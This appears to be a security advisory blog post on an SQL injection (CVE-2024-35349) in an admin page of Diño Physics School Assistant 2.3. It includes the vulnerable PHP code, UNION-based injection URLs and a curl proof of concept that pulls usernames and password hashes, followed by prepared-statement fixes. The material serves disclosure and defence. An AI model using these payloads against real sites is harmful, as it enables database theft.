In June 2024, security researchers identified a dangerous SQL Injection vulnerability in Diño Physics School Assistant, version 2.3. The flaw affects the /admin/category/view_category.php file and specifically lets attackers inject code into the id URL parameter, risking your database and possibly leaking all sensitive data. This post explains how this bug works, shows you how it's exploited, and helps you secure your system.

About Diño Physics School Assistant

Diño Physics School Assistant helps teachers manage physics lessons, quizzes, and resources online. Many schools use it to help their students and staff. But like many open-source PHP projects, it can have critical vulnerabilities if not checked.

The Vulnerability: Where and What?

Vulnerability: SQL Injection (CWE-89)
CVE: CVE-2024-35349
Affected File: /admin/category/view_category.php
Vulnerable Parameter: id in the GET request
Version: 2.3 and likely below

Vulnerable Code Snippet

The source of the vulnerability is the way user input from the URL is handled directly in an SQL query, like this:

// /admin/category/view_category.php (Simplified)
$id = $_GET['id'];
$sql = "SELECT * FROM category WHERE id = $id";
$result = mysqli_query($conn, $sql);

What's wrong:
There is no input validation or sanitization, leaving the SQL statement wide open to injection.

If you have access to the admin panel and visit

https://<site>/admin/category/view_category.php?id=1

You get details for category 1.

But an attacker can use

https://<site>/admin/category/view_category.php?id=1 OR 1=1

This turns the query into

SELECT * FROM category WHERE id = 1 OR 1=1

That gives ALL categories, ignoring access controls.

Attackers can do far worse – even _dump all user tables_!

A hacker could try

https://<site>/admin/category/view_category.php?id=1 UNION SELECT 1,@@version,3,4--

This returns the MySQL version, showing the exploit works.

Full Proof-of-Concept (PoC)

# Basic exploitation using curl
curl "https://target.com/admin/category/view_category.php?id=1 UNION SELECT 1,username,password,4 FROM users--"

This shows usernames and password hashes from the users table.

Possibly gain further access if the application uses the database for authentication

Complexity:
Low. Any user with access to /admin/category/view_category.php can exploit this.

Mitigation & Recommendations

1. UPDATE IMMEDIATELY: Check if there’s a patch or new release from Diño Physics School Assistant.

How to fix in code

// Use prepared statements
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM category WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

3. Restrict Access: Limit access to /admin interface by IP or VPN.

Further Reading & References

- Original CVE record
- OWASP: SQL Injection
- How to Fix SQL Injection in PHP

Conclusion

CVE-2024-35349 in Diño Physics School Assistant 2.3 is a serious SQL Injection that can put your users’ data at risk. Patch as soon as possible, and always use secure coding practices!

Timeline

Published on: 05/30/2024 17:15:33 UTC
Last modified on: 08/01/2024 13:52:38 UTC